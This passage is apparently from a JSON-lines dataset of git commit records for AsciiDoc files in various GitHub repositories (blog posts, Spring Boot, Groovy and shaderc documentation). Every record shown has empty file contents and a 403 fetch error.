2016-08-12-Why-Using-Framework.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_file":"_posts\/2016-08-12-Why-Using-Framework.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da3048f6ca8ddb1aebe082116e8081043c12d5e1","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7beac66cb14469ae178f4aa03e2c028daacc082f","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5036d06ef486b89b7e588269ab9c57bce382162","subject":"Update 2017-01-30-Introducing-a-new-blog.adoc","message":"Update 2017-01-30-Introducing-a-new-blog.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-01-30-Introducing-a-new-blog.adoc","new_file":"_posts\/2017-01-30-Introducing-a-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03eb004fd71b600a449ba8ad09348cf29736e332","subject":"Update 2015-09-06-wen.adoc","message":"Update 2015-09-06-wen.adoc","repos":"suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io,suning-wireless\/Suning-Wireless.github.io","old_file":"_posts\/2015-09-06-wen.adoc","new_file":"_posts\/2015-09-06-wen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suning-wireless\/Suning-Wireless.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a0373057d392ba532f871819ae5bd6c458c480d","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3d40e69d3def92636fcc48f5e498430d873b8eb1","subject":"Update 2017-10-15-git.adoc","message":"Update 2017-10-15-git.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-15-git.adoc","new_file":"_posts\/2017-10-15-git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d331ff5c149278fbdadf494b9bd3bc415a478603","subject":"y2b create post Here's How To Make The iPhone Great Again...","message":"y2b create post Here's How To Make The iPhone Great Again...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-21-Heres-How-To-Make-The-iPhone-Great-Again.adoc","new_file":"_posts\/2017-03-21-Heres-How-To-Make-The-iPhone-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb52a4ac8bdcee94e93c27e91c4a7f7318a8a99a","subject":"Update 2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","message":"Update 2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","new_file":"_posts\/2017-05-04-Episode-97-Implausibility-Goggles-to-Max.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd8cc9844ca011162dc94521594c9dcdef78273","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dd8980f2532eb09a7d3d22140a76f7147a4f02b","subject":"readme file updated","message":"readme file updated\n","repos":"axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot,axibase\/spring-boot","old_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_file":"spring-boot-samples\/spring-boot-sample-metrics-atsd\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/axibase\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f5e3b48529c0417c9099628d2ed84409768f789","subject":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","message":"Update 2017-06-22-A-Disjuncao-no-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_file":"_posts\/2017-06-22-A-Disjuncao-no-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d923d2c4edc25751feda9242774b35592fbbcb4c","subject":"y2b create post Laser Glow Headphones - What Magic Is This?","message":"y2b create post Laser Glow Headphones - What Magic Is This?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-06-Laser-Glow-Headphones--What-Magic-Is-This.adoc","new_file":"_posts\/2016-09-06-Laser-Glow-Headphones--What-Magic-Is-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1489a81f67d14b50cbc51a4cd294f32902abfd02","subject":"Update 2015-10-11-Maven-in-5-Minutes.adoc","message":"Update 2015-10-11-Maven-in-5-Minutes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_file":"_posts\/2015-10-11-Maven-in-5-Minutes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93b5f09fe7e569636d8ad29ef2edbc868f802348","subject":"Update 2016-07-17-Welcome-to-Juhoooo.adoc","message":"Update 2016-07-17-Welcome-to-Juhoooo.adoc","repos":"xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io,xumr0x\/xumr0x.github.io","old_file":"_posts\/2016-07-17-Welcome-to-Juhoooo.adoc","new_file":"_posts\/2016-07-17-Welcome-to-Juhoooo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xumr0x\/xumr0x.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14962197ba2425360a21101b4598b5d5736a8c4d","subject":"Add news\/2016-08-10-forge-3.3.0.final.asciidoc","message":"Add news\/2016-08-10-forge-3.3.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-08-10-forge-3.3.0.final.asciidoc","new_file":"news\/2016-08-10-forge-3.3.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8d2916b862fba072c3444e10fc11f56c57d77179","subject":"Create Installation.adoc","message":"Create Installation.adoc","repos":"ClubCedille\/metaclub,ClubCedille\/metaclub","old_file":"doc\/Installation.adoc","new_file":"doc\/Installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ClubCedille\/metaclub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8d9eab285aa6499af345fd8b30aa5983475bbeb","subject":"Update 2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","message":"Update 2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","new_file":"_posts\/2016-09-19-Rant-The-Teletubbies-Documentation-Pitfall.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bad8fb72bdc0e64e669a58743079b2c29e976b0","subject":"Created the SSO xPaaS doc. This doc has taken feedback from technical and peer review and is ready for publication.","message":"Created the SSO xPaaS doc. This doc has taken feedback from technical and peer review and is ready for publication.\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_images\/xpaas_images\/sso.adoc","new_file":"using_images\/xpaas_images\/sso.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0ea6fb3261e16dfbc61ddcf017d4d7dc84af09aa","subject":"Improve error page documentation","message":"Improve error page documentation\n\nCloses gh-5722\n","repos":"yhj630520\/spring-boot,afroje-reshma\/spring-boot-sample,sebastiankirsch\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,habuma\/spring-boot,bjornlindstrom\/spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,bclozel\/spring-boot,hqrt\/jenkins2-course-spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,brettwooldridge\/spring-boot,bclozel\/spring-boot,herau\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,jxblum\/spring-boot,zhanhb\/spring-boot,shakuzen\/spring-boot,bijukunjummen\/spring-boot,hello2009chen\/spring-boot,michael-simons\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,DeezCashews\/spring-boot,mbenson\/spring-boot,yangdd1205\/spring-boot,lucassaldanha\/spring-boot,tiarebalbi\/spring-boot,ilayaperumalg\/spring-boot,i007422\/jenkins2-course-spring-boot,akmaharshi\/jenkins,i007422\/jenkins2-course-spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,linead\/spring-boot,shangyi0102\/spring-boot,philwebb\/spring-boot,afroje-reshma\/spring-boot-sample,dreis2211\/spring-boot,i007422\/jenkins2-course-spring-boot,i007422\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,aahlenst\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,linead\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,vpavic\/spring-boot,jbovet\/spring-boot,kdvolder\/spring-boot,Nowheresly\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,wilkinsona\/spring-boot,rweisleder\/spring-boot,tsachev\/spring-boot,bjornlindstrom\/spring-boot,ollie314\/spring-boot,htynkn\/spring-boot,htynkn\/spring-boot,RichardCSantana\/spring-boot,Buzzardo\/spring-boot,htynkn\/spring-boot,herau\/spring-boot,yhj630520\/spring-boot,bbrouwer\/spring-boot,dreis2211\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,sbcoba\/spring-boot,jayarampradhan\/spring-boot,hqrt\/jenkins2-course-spring-boot,jbovet\/spring-boot,shakuzen\/spring-boot,akmaharshi\/jenkins,javyzheng\/spring-boot,candrews\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,ilayaperumalg\/spring-boot,eddumelendez\/spring-boot,i007422\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,Nowheresly\/spring-boot,mdeinum\/spring-boot,ihoneymon\/spring-boot,nebhale\/spring-boot,hqrt\/jenkins2-course-spring-boot,pvorb\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,kamilszymanski\/spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,mdeinum\/spring-boot,NetoDevel\/spring-boot,SaravananParthasarathy\/SPSDemo,ihoneymon\/spring-boot,royclarkson\/spring-boot,mosoft521\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,mbogoevici\/spring-boot,pvorb\/spring-boot,bijukunjummen\/spring-boot,bclozel\/spring-boot,Buzzardo\/spring-boot,drumonii\/spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,shangyi0102\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,NetoDevel\/spring-boot,jxblum\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,ptahchiev\/spring-boot,thomasdarimont\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,xiaoleiPENG\/my-project,kdvolder\/spring-boot,vpavic\/spring-boot,ilayaperumalg\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,Nowheresly\/spring-boot,Buzzardo\/spring-boot,jvz\/spring-boot,joshthornhill\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,vakninr\/spring-boot,habuma\/spring-boot,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,lexandro\/spring-boot,javyzheng\/spring-boot,NetoDevel\/spring-boot,minmay\/spring-boot,mbenson\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,akmaharshi\/jenkins,royclarkson\/spring-boot,lburgazzoli\/spring-boot,zhanhb\/spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,olivergierke\/spring-boot,michael-simons\/spring-boot,joshiste\/spring-boot,linead\/spring-boot,ilayaperumalg\/spring-boot,DeezCashews\/spring-boot,tiarebalbi\/spring-boot,vakninr\/spring-boot,shakuzen\/spring-boot,xiaoleiPENG\/my-project,ollie314\/spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,linead\/spring-boot,candrews\/spring-boot,joshthornhill\/spring-boot,mdeinum\/spring-boot,shangyi0102\/spring-boot,felipeg48\/spring-boot,michael-simons\/spring-boot,pvorb\/spring-boot,Nowheresly\/spring-boot,kdvolder\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,dreis2211\/spring-boot,vakninr\/spring-boot,kamilszymanski\/spring-boot,zhanhb\/spring-boot,mbogoevici\/spring-boot,wilkinsona\/spring-boot,tsachev\/spring-boot,isopov\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,yhj630520\/spring-boot,shakuzen\/spring-boot,isopov\/spring-boot,mbogoevici\/spring-boot,drumonii\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,kdvolder\/spring-boot,mbogoevici\/spring-boot,lucassaldanha\/spring-boot,jvz\/spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,RichardCSantana\/spring-boot,shakuzen\/spring-boot,brettwooldridge\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,minmay\/spring-boot,javyzheng\/spring-boot,lburgazzoli\/spring-boot,ihoneymon\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,SaravananParthasarathy\/SPSDemo,minmay\/spring-boot,herau\/spring-boot,philwebb\/spring-boot,lexandro\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,nebhale\/spring-boot,donhuvy\/spring-boot,sebastiankirsch\/spring-boot,aahlenst\/spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,habuma\/spring-boot,sebastiankirsch\/spring-boot,joshthornhill\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,candrews\/spring-boot,spring-projects\/spring-boot,philwebb\/spring-boot-concourse,bjornlindstrom\/spring-boot,candrews\/spring-boot,ollie314\/spring-boot,nebhale\/spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,RichardCSantana\/spring-boot,jbovet\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jxblum\/spring-boot,isopov\/spring-boot,ihoneymon\/spring-boot,cleverjava\/jenkins2-course-spring-boot,eddumelendez\/spring-boot,yhj630520\/spring-boot,aahlenst\/spring-boot,chrylis\/spring-boot,DeezCashews\/spring-boot,minmay\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot,eddumelendez\/spring-boot,kdvolder\/spring-boot,jvz\/spring-boot,dreis2211\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,spring-projects\/spring-boot,ptahchiev\/spring-boot,scottfrederick\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,tsachev\/spring-boot,afroje-reshma\/spring-boot-sample,shakuzen\/spring-boot,lucassaldanha\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,bjornlindstrom\/spring-boot,scottfrederick\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,ihoneymon\/spring-boot,sbcoba\/spring-boot,ptahchiev\/spring-boot,habuma\/spring-boot,bijukunjummen\/spring-boot,sebastiankirsch\/spring-boot,akmaharshi\/jenkins,SaravananParthasarathy\/SPSDemo,michael-simons\/spring-boot,aahlenst\/spring-boot,zhanhb\/spring-boot,wilkinsona\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,eddumelendez\/spring-boot,olivergierke\/spring-boot,wilkinsona\/spring-boot,donhuvy\/spring-boot,candrews\/spring-boot,hello2009chen\/spring-boot,bbrouwer\/spring-boot,zhanhb\/spring-boot,jayarampradhan\/spring-boot,ptahchiev\/spring-boot,deki\/spring-boot,spring-projects\/spring-boot,cleverjava\/jenkins2-course-spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,philwebb\/spring-boot,philwebb\/spring-boot-concourse,joshiste\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot-concourse,jxblum\/spring-boot,bclozel\/spring-boot,joshthornhill\/spring-boot,bijukunjummen\/spring-boot,ilayaperumalg\/spring-boot,hello2009chen\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,linead\/spring-boot,jxblum\/spring-boot,jbovet\/spring-boot,htynkn\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,lburgazzoli\/spring-boot,mosoft521\/spring-boot,lexandro\/spring-boot,tiarebalbi\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,kamilszymanski\/spring-boot,deki\/spring-boot,hqrt\/jenkins2-course-spring-boot,zhanhb\/spring-boot,joshiste\/spring-boot,royclarkson\/spring-boot,vpavic\/spring-boot,sebastiankirsch\/spring-boot,mdeinum\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,rweisleder\/spring-boot,afroje-reshma\/spring-boot-sample,mbenson\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot-concourse,pvorb\/spring-boot,rweisleder\/spring-boot,sbcoba\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,scottfrederick\/spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,ptahchiev\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,qerub\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,sbcoba\/spring-boot,deki\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,isopov\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,hqrt\/jenkins2-course-spring-boot,chrylis\/spring-boot,mbenson\/spring-boot,jayarampradhan\/spring-boot,qerub\/spring-boot,lexandro\/spring-boot,philwebb\/spring-boot-concourse,mosoft521\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,mbenson\/spring-boot,deki\/spring-boot,donhuvy\/spring-boot,drumonii\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4210dee3c476b21524022360a688123a27fd70d2","subject":"Clarify the type requirement of groovy-all dependency","message":"Clarify the type requirement of groovy-all dependency\n","repos":"paulk-asert\/groovy,apache\/incubator-groovy,russel\/groovy,russel\/groovy,shils\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,paulk-asert\/groovy,russel\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,armsargis\/groovy,apache\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,shils\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,paulk-asert\/groovy,shils\/groovy,paulk-asert\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,russel\/incubator-groovy,paulk-asert\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,traneHead\/groovy-core,apache\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,russel\/incubator-groovy,russel\/incubator-groovy,traneHead\/groovy-core,shils\/groovy,apache\/groovy,apache\/groovy,jwagenleitner\/incubator-groovy,jwagenleitner\/groovy,russel\/groovy,armsargis\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,armsargis\/groovy,jwagenleitner\/incubator-groovy,jwagenleitner\/groovy","old_file":"src\/spec\/doc\/tools-groovyc.adoc","new_file":"src\/spec\/doc\/tools-groovyc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jwagenleitner\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"09dd0a2ab9f9ed4a4603cf490e75606aebc180a0","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32abb8b3191d4209b7d8c8ea39869891628da945","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3bdf592b9177d5063137be0ccdd0f2fb8d74220","subject":"Add -I to the glslc synopsis.","message":"Add -I to the glslc synopsis.\n","repos":"dneto0\/shaderc,dneto0\/shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,dneto0\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuchsia-mirror\/third_party-shaderc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bbe331a087402b2a5e68f0d7c58856c0acb7a5e4","subject":"Add common quote controller","message":"Add common quote controller\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-quoteController.adoc","new_file":"src\/main\/docs\/common-quoteController.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6dd2a79a9560f24644d229988f2240efe6877811","subject":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","message":"Update 2015-08-01-Die-Pause-ist-vorbei.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_file":"_posts\/2015-08-01-Die-Pause-ist-vorbei.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2129bcb06011f2682171964bc30fdd19ffa4695","subject":"scaled images and indent code in web steps, re-structured quick reference index and documented attribute","message":"scaled images and indent code in web steps, re-structured quick reference index and documented attribute\n","repos":"janih\/open-dolphin,canoo\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin,janih\/open-dolphin,janih\/open-dolphin,canoo\/open-dolphin","old_file":"subprojects\/documentation\/src\/docs\/asciidoc\/ref\/action\/action.adoc","new_file":"subprojects\/documentation\/src\/docs\/asciidoc\/ref\/action\/action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/janih\/open-dolphin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e0e4bbdf4a9cad591bed171e14da79b80666824","subject":"Plugin use cases document","message":"Plugin use cases 